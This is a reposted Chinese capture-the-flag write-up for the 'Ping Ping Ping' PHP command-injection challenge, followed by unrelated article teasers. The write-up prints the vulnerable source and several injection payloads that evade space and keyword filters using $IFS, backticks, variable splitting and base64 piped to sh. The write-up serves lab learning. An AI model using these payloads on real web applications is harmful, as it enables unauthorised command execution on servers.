当前位置：首页 > news >正文

[GXYCTF 2019]Ping Ping Ping 题解(多种解题方式)

news 文章来源：https://blog.csdn.net/weixin_73904941/article/details/143275207 2025/1/18 11:45:22

知识点:

命令执行

linux空格绕过

反引号绕过变量绕过 base64编码绕过

打开页面提示 "听说php可以执行系统函数？我来康康"

然后输入框内提示输入 bjut.edu.cn 输入之后回显信息,是ping 这个网址的信息

输入127.0.0.1

因为提示是命令执行,并且会执行ping操作,用;分隔命令,输入

bjut.edu.cn;ls

发现回显了两个文件flag.php 和 index.php 也说明是linux环境,查看一下flag.php文件

输入bjut.edu.cn;cat flag.php 报错fxck your space!

说明是过滤了空格
#${IFS} $IFS$1 %09 %20 ${IFS <重定向符号有时候都可以替代空格就看题目过滤了什么符号

尝试之后发现$IFS$1可以最后的1可以是其他数字,效果是一样的

bjut.edu.cn;cat$IFS$1flag.php

回显fxck your flag! flag也被过滤了
那就查看一下index.php文件,发现里面是源代码

if(isset($_GET['ip'])){$ip = $_GET['ip'];if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){print_r($match);print($ip);echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);die("fxck your symbol!");}else if(preg_match("/ /", $ip)){die("fxck your space!");}else if(preg_match("/bash/", $ip)){die("fxck your bash!");}else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){#检查字符串中是否分别含有 'f', 'l', 'a', 'g' 这四个字母,无论这四个字母之间有多少或什么其他的字符,而且它们出现的顺序与 "flag" 字符串中的顺序相同die("fxck your flag!");}$a = shell_exec("ping -c 4 ".$ip);echo "";print_r($a);}

方法一: 反引号绕过

其中过滤了很多符号,但是没有过滤反引号``

使用反引号绕过 bjut.edu.cn;cat$IFS$1`ls` (先执行``里面的代码,绕过输入flag的限制)

然后f12查看源码得到被注释的flag

方法二:变量绕过

例如a=l;b=s;$a$b 就会执行ls
输入框输入 127.0.0.1;x=f;cat$IFS$1$xlag.php
这种情况会显示fuck flag,即被过滤,因为整个字符串参数ip中 f l a g 顺序出现

127.0.0.1;x=l;cat$IFS$1f$xag.php    没被过滤,但是不回显flag
127.0.0.1;x=a;cat$IFS$1fl$xg.php    也是一样不回显flag
127.0.0.1;x=g;cat$IFS$1fla$x.php    查看源码得到flag
127.0.0.1;x=ag;cat$IFS$1fl$x.php    查看源码也可以得到flag
127.0.0.1;x=lag;cat$IFS$1f$x.php    查看源码也可以得到flag

这里我的理解是f$xag.php 和 fl$xg.php 不回显flag 是因为把原本的参数$x 当成了$xag 和 $xg
所以要把参数放在最后才会识别为$x

方法三:base64编码绕过

这里还可以将cat flag.php进行base64编码
得到Y2F0IGZsYWcucGhw 再用base64-d命令来执行
虽然过滤了bash但大部分命令仍然可以用sh来代替执行

127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

使用 echo命令使得cat flag.php的base64编码被正确地作为输入参数传递给 base64 -d

即前面的 echo$IFS$1Y2F0IGZsYWcucGhw 作为管道符的输入

同样可以使用反引号``配合base64编码绕过,这样不需要使用sh

127.0.0.1;`echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d`

[GXYCTF 2019]Ping Ping Ping 题解(多种解题方式)

知识点: 命令执行 linux空格绕过反引号绕过变量绕过 base64编码绕过打开页面提示 "听说php可以执行系统函数？我来康康" 然后输入框内提示输入 bjut.edu.cn 输入之后回显信息,是ping 这个网址的信息输入127.0.0.1 因为提示是命令…...

编程日记 2024/10/29 7:58:09

MODSI EVI 数据的时间序列拟合一阶谐波模型

目录简介函数 ee.Reducer.linearRegression(numX, numY) Arguments: Returns: Reducer ee.Image.cat(var_args) Arguments: Returns: Image hsvToRgb() Arguments: Returns: Image 代码结果简介 MODIS/006/MOD13A1数据是由美国国家航空航天局（NASA）的MODIS…...

编程日记 2024/10/29 7:57:07

Java：String类（超详解！）

一.常用方法 🥏1.字符串构造字符串构造有三种方法： 📌注意： 1. String是引用类型，内部并不存储字符串本身如果String是一个引用那么s1和s3应该指向同一个内容，s1和s2是相等的，应该输出两…...

编程日记 2024/10/29 7:55:05

【日志】力扣13.罗马数字转整数 || 解决泛型单例热加载失败问题

2024.10.28 【力扣刷题】 13. 罗马数字转整数 - 力扣（LeetCode）https://leetcode.cn/problems/roman-to-integer/description/?envTypestudy-plan-v2&envIdtop-interview-150这题用模拟的思想可以给相应的字母赋值，官方的答案用的是用一…...

编程日记 2024/10/29 7:54:01

Mybatis高级

系列文章目录高级Mybatis，一些结果映射，引入新的注解目录系列文章目录文章目录一、结果映射 1.ResultType 2.ResultMap 基础应用： 二、一对一嵌套结果和嵌套查询嵌套结果嵌套查询区别三、一对多四、多对多五、注解补充 1.一对一…...

编程日记 2024/10/29 7:51:55

【spark】spark structrued streaming读写kafka 使用kerberos认证

spark版本:2.4.0 官网 Spark --files使用总结 Spark --files理解一、编写jar import org.apache.kafka.clients.CommonClientConfigs import org.apache.kafka.common.config.SaslConfigs import org.apache.spark.sql.SparkSession import org.apache.spark.sql.streaming.T…...

编程日记 2024/10/29 7:50:54

【脚本】B站视频AB复读

控制台输入如下代码，回车 const video document.getElementsByTagName("video")[0];//获取bpx-player-control-bottom-center容器,更改其布局方式const div document.getElementsByClassName("bpx-player-control-bottom-center")[0];div.sty…...

编程日记 2024/10/29 7:49:52

leetcode - 257. 二叉树的所有路径

257. 二叉树的所有路径题目解决做法一：深度优先搜索回溯深度优先搜索（Depth-First Search, DFS）是一种用于遍历或搜索树或图的算法。这种搜索方式会尽可能深地探索每个分支，直到无法继续深入为止，然后回溯到上…...

编程日记 2024/10/29 7:48:51

python 相关

python 1. pip 安装某个版本范围的软件 pip install “elasticsearch>6,<7” pip install elasticsearchX.Y.Z 2. pip 查看包版本 pip show pandas 3. pip 下载whl包 https://tendcode.com/subject/article/pip-offline-download/ (更多平台与架构)pip downl…...

编程日记 2024/10/29 7:47:49

静态分析2：控制流分析（构建CFG）

参考：南京大学《软件分析》课程2 1、控制流分析控制流分析实际上指的是构建控制流图（Control Flow Graph，CFG）CFG是静态分析的基础数据结构CFG的节点可以是单个指令、基本块（Basic Block，BB）…...

编程日记 2024/10/29 7:46:48

Linux 应用领域

目录服务器领域桌面环境软件开发数据分析与科学计算嵌入式系统虚拟化和云计算人工智能与机器学习物联网（IoT） 网络安全服务器领域 Linux在服务器领域的应用是其最为广泛和成熟的领域之一。由于其开源、稳定、高效和安全的特性&#xf…...

编程日记 2024/10/29 7:45:46

FPM383C指纹模块超详解附驱动

0. 本人使用环境介绍 0.1 硬件环境 ESP32-C3FPM383C指纹模块一根破旧的usb数据线 0.2 软件环境 Clion2024.2.2ESP-IDF5.3.1Clion插件ESP-IDF 1. 硬件接口说明 1.1 UART UART 缺省波特率为 57.6Kbps，数据格式：8 位数据位，2 位停止位&am…...

编程日记 2024/10/29 7:42:44

若依框架篇-若依集成 X-File-Storage 框架（实现图片上传阿里云 OSS 服务器）、EasyExcel 框架（实现 Excel 数据批量导入功能）

🔥博客主页： 【小扳_-CSDN博客】 ❤感谢大家点赞👍收藏⭐评论✍ 文章目录 1.0 实现使用 Excel 文件批量导入 1.1 导入功能的前端具体实现 1.2 导入功能的后端具体实现 1.3 使用 EasyExcel 框架实现 Excel 读、写功能 1.4 将 Easy Excel 集成到…...

编程日记 2024/10/29 7:41:42

.rmallox勒索病毒肆虐：如何有效防范与应对

引言在当今这个数字化时代，网络安全已成为一个不可忽视的重要议题。随着信息技术的飞速发展，网络空间的安全威胁也日益复杂多变。病毒、木马、勒索软件等恶意程序层出不穷，比如.rmallox勒索病毒。它们利用先进的技术手段，如代码…...

编程日记 2024/10/29 7:40:41

人工智能能否影响未来生活：一场深刻的社会与技术变革

随着人工智能技术的不断发展，我们已经目睹了它在各行各业掀起的巨大变革浪潮。从医疗行业的病例诊断、药物研发，到企业运营的数据分析、智能决策，再到日常生活中的智能语音助手、自动驾驶汽车、智能家居，人工智能正以前所未有的速…...

编程日记 2024/10/29 7:37:37

cmu 15-445学习笔记-3 存储引擎

03 Database Storage-Part Ⅰ 数据库存储上半部分数据库分层划分结构图： Disk Manager：存储引擎，管理磁盘上的文件Bufferpool Manager：管理内存的缓存池Access Methods：访问方法Operator Execution：执行…...

编程日记 2024/10/29 7:35:36

[linux]和windows间传输命令scp 执行WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!错误解决

[linux]和windows间传输命令scp 执行WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!错误解决. 现象： 原因： 接收方服务器系统做了某些更改，导致登录时会报错。主要因为接收方服务器对登录过它的主机都会把该主机登录标识证书记录下来&a…...

编程日记 2024/10/29 7:34:35

C++ | Leetcode C++题解之第518题零钱兑换II

题目： 题解： class Solution { public:int change(int amount, vector<int>& coins) {vector<int> dp(amount 1), valid(amount 1);dp[0] 1;valid[0] 1;for (int& coin : coins) {for (int i coin; i < amount; i) {valid[…...

编程日记 2024/10/29 7:31:32

高并发-负载均衡

负载均衡在微服务架构中是一个重要的组成部分，旨在优化资源利用、提高服务可用性和确保系统的高可扩展性。以下是对微服务中的负载均衡的详细介绍，包括其原理、类型、实现方式以及相关的技术。一、负载均衡的原理负载均衡的基本原理是将进入系统的请…...

编程日记 2024/10/29 7:29:30

Docker 常用命令全解析：提升对雷池社区版的使用经验

Docker 常用命令解析 Docker 是一个开源的容器化平台，允许开发者将应用及其依赖打包到一个可移植的容器中。以下是一些常用的 Docker 命令及其解析，帮助您更好地使用 Docker。 1. Docker 基础命令查看 Docker 版本 docker --version查看 Docker 运行…...

编程日记 2024/10/29 7:28:28

基于 Postman 和 Elasticsearch 测试乐观锁的操作流程

鱼说，你看不到我眼中的泪，因为我在水中。水说，我能感觉到你的泪，因为你在我心中。 -村上春树在分布式系统中，多个并发操作对同一资源的修改可能导致数据不一致。为了解决这种问题，Elasticsearch 提供了乐观…...

编程日记 2024/10/29 7:27:27

如何从PPT中导出600dpi的高清图

Step1. 修改PPT注册表具体过程，参见如下链接：修改ppt注册表，导出高分辨率图片 Step2. 打开PPT，找到自己想要保存的图，选中图像，查看图像尺寸并记录 Step3. 重新新建一个PPT，并根据记录的图片…...

编程日记 2024/10/29 7:24:24

day01-ElasticStack+Kibana

ElasticStack-数据库 #官网https://www.elastic.co/cn/ #下载7.17版环境准备主机名IP系统版本VMware版本elk110.0.0.91Ubuntu 22.04.417.5.1elk210.0.0.92Ubuntu 22.04.417.5.1elk310.0.0.93Ubuntu 22.04.417.5.1 单机部署ES 1.下载ES软件包，放到/usr/local下 […...

编程日记 2024/10/29 7:23:23

HTML 约束验证

HTML5引入了表单相关的一些新机制：它为<input>元素和约束验证增加了一些新的语义类型，使得客户端检查表单内容变得容易。基本上，通过设置一些新的属性，常用的约束条件可以无需 JavaScript 代码而检测到；对于更复…...

编程日记 2024/10/29 7:21:20

vue3项目开发一些必备的内容，该安装安装，该创建创建

重新整理了一下项目开发必备的一些操作，以后直接复制黏贴运行，随着项目开发，后期会陆续补充常用插件或组件等如果你是还没有安装过的新人，建议从《通过安装Element UI/Plus来学习vue之如何创建项目、搭建vue脚手架、npm下载、封装…...

编程日记 2024/10/29 7:20:18

2D拓扑图

2D拓扑图主要指的是在二维平面上表示物体形状和关系的一种图形表示方法。一、基本概念 2D网格拓扑结构：在二维平面上，由一系列的节点（node）和边（edge）组成。每个节点代表一个具体的位置或坐标点&#xf…...

编程日记 2024/10/29 7:19:17

大数据面试题整理——Hive

系列文章目录大数据面试题专栏点击进入文章目录系列文章目录Hive 面试知识点全面解析一、函数相关（一）函数分类与特点（二）concat和concat_ws的区别二、SQL 的书写和执行顺序（一）书写顺序（二…...

编程日记 2024/10/29 7:18:15

Python实现图像（边缘）锐化：梯度锐化、Roberts 算子、Laplace算子、Sobel算子的详细方法

目录 Python实现图像（边缘）锐化：梯度锐化、Roberts算子、Laplace算子、Sobel算子的详细方法引言一、图像锐化的基本原理1.1 什么是图像锐化？1.2 边缘检测的基本概念二、常用的图像锐化算法2.1 梯度锐化2.1.1 实现步骤 2.2 Robert…...

编程日记 2024/10/29 7:17:13

【电机控制】相电流重构——单电阻采样方案

【电机控制】相电流重构——单电阻采样方案文章目录 [TOC](文章目录) 前言一、基于单电阻采样电流重构技术原理分析1.1 单电阻采样原理图1.2 基本电压矢量与电流采样关系二、非观测区2.1 扇区过渡区2.2 低压调制区三、非观测区补偿——移相法四、参考文献总结前言使用工具…...

编程日记 2024/10/29 7:14:11

#基础算法

1 差分练习 1 模板题代码实现： import java.util.Scanner;public class Main {public static void main(String[] args) {Scanner sc new Scanner(System.in);int n sc.nextInt();int m sc.nextInt();int num sc.nextInt();long[][] arr new long[n 2][m …...

编程日记 2024/10/29 7:13:10

做网站后台运营这个工作怎么样/seo网站建设优化

学习目标掌握什么是serverless和FaaS 学习使用阿里云函数计算(FC)构建多语言的后台服务使用Spring Boot 阿里云函数计算 OSS打造极低成本的表白小程序一、520表白小程序介绍 1.1 需求说明距离一年一度的520全民表白日，只！有！一&a…...

编程日记 2025/1/18 11:44:42

大朗网站建设公司/谷歌浏览器下载安装2023最新版

本文来自：[url]http://bbs.51cto.com/thread-9204-1-1.html[/url]网络IP地址“主要”分为ABC三类，以下是覆盖范围：A类：0.0.0.0 - 127.255.255.255，标谁的子网掩码是255.0.0.0(按子网掩码的另一种标注方法是/8&#xff…...

编程日记 2025/1/18 11:35:36

固原网站建设/域名查询系统

一、SDK的安装安装过程中不要插相机，且一定注意SDK和realsense_ros之间的版本对应关系我这里使用的版本是2.42.0，对应成功的包，可以到该链接下直接下载，https://download.csdn.net/download/YOULANSHENGMENG/87672407 然后再N…...

编程日记 2025/1/18 11:05:16

网站建设营销公司/淘宝代运营公司十大排名

网上分页存储过程的代码很多，这个是我一直在用的经典的三层架构里提取出来的，并做了部分语句的优化... 如有更好的欢迎讨论！ set ANSI_NULLS ON set QUOTED_IDENTIFIER ON GO ------------------------------------ --用途：分页存…...

编程日记 2025/1/18 8:34:50